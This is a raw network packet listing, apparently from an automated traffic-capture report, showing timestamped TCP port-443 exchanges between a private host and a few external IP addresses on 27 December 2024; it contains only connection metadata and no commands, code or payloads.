                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140609980 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140630007 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140786886 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140799999 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140822887 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140831947 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140841961 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140851974 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140952110 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140969992 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141072989 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141086102 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141169071 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141181946 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141233921 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141247034 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141280890 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141289949 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141302109 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141309977 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141325951 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141333103 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141573906 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141582966 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141607046 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141614914 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141632080 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141643047 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141695976 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141705036 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141722918 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141731977 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141741991 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141746998 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141763926 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141768932 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141797066 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141808987 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141848087 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141856909 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141875982 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.141885042 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.142036915 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.142065048 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.142199993 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.143090010 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.143224001 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.183337927 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.224191904 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.224253893 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.224276066 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.224530935 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.224685907 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.267362118 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.269431114 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.269527912 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.269606113 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.269634962 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.269923925 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.315327883 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.323918104 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.324314117 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.324325085 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.324352026 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.324400902 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.324467897 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.367322922 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.369769096 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.370121956 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.370413065 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.370599031 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.370754004 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.378350019 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.385000944 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.385030985 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.385492086 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.385519981 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.385658026 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.385941029 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.386007071 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.397059917 CET49862443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.427347898 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.430314064 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.430500031 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.430577040 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.431039095 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.431093931 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.439347982 CET4434986220.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.469880104 CET49873443192.168.2.518.238.49.124
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.471328020 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.480202913 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.480225086 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.480242014 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.480468988 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.480490923 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.480560064 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.498225927 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.498493910 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.498517990 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.498639107 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.498661995 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.498774052 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.498786926 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.498801947 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.498871088 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.511363029 CET4434987318.238.49.124192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.539340019 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.539652109 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.539761066 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.539833069 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.539843082 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.539875984 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.540088892 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.583364964 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.583609104 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.583673000 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.583694935 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.583719015 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.583728075 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.583743095 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.583806992 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.617614031 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.617779016 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.617865086 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.617892027 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.617942095 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.617959023 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.618069887 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.618170977 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.618215084 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.618264914 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.618314028 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.618513107 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.618706942 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.618834019 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.618843079 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.618865013 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.618876934 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.618891001 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.618942976 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.618968010 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.619035006 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.619072914 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.619100094 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.619113922 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.619147062 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.619195938 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.659332991 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.661849976 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.662257910 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.662298918 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.662347078 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.707350969 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.717997074 CET49910443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.718034983 CET4434991052.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.718215942 CET49910443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.718461037 CET49910443192.168.2.552.168.117.170
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.718472958 CET4434991052.168.117.170192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.730294943 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.730441093 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.730509996 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.730623007 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.738204002 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.738358021 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.738393068 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.738451958 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.738518953 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.738533020 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.739027977 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.739104986 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.739150047 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.739823103 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.739912033 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.740077972 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.740092993 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.740112066 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.740158081 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.740171909 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.740190983 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.740251064 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.741199970 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.741508007 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.741549015 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.741589069 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.741602898 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.741619110 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.741626978 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.741651058 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.741663933 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.741667986 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.741703987 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.741746902 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.741770029 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.741780043 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.741790056 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.741796017 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.741811037 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.741847038 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.741859913 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.742026091 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.742033958 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.742176056 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.742856979 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.743107080 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.743879080 CET44349888188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.743951082 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.743957043 CET44349888188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.744059086 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.748368025 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.748395920 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.748631954 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.748641014 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.748657942 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.748704910 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.748826027 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.748842955 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.748852968 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.748903036 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.750571012 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.750586033 CET44349888188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.756845951 CET49911443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.756896019 CET44349911188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.756970882 CET49911443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.763827085 CET49911443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.763854980 CET44349911188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.791341066 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.791794062 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.791845083 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.791902065 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.791924953 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.791981936 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.791995049 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.792139053 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.804539919 CET4434987318.238.49.124192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.804631948 CET4434987318.238.49.124192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.804781914 CET49873443192.168.2.518.238.49.124
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.807457924 CET49873443192.168.2.518.238.49.124
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.807490110 CET4434987318.238.49.124192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.819375038 CET49913443192.168.2.518.238.49.124
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.819410086 CET4434991318.238.49.124192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.819535971 CET49913443192.168.2.518.238.49.124
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.819714069 CET49913443192.168.2.518.238.49.124
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.819725990 CET4434991318.238.49.124192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.835345030 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.839536905 CET4434986220.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.839658022 CET4434986220.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.839853048 CET49862443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.850729942 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.850877047 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.850934982 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.851032019 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.851073980 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.857678890 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.857812881 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.857861042 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.857892036 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.857925892 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.858290911 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.858514071 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.858649969 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.858755112 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.858799934 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.860076904 CET44349902188.245.216.205192.168.2.5
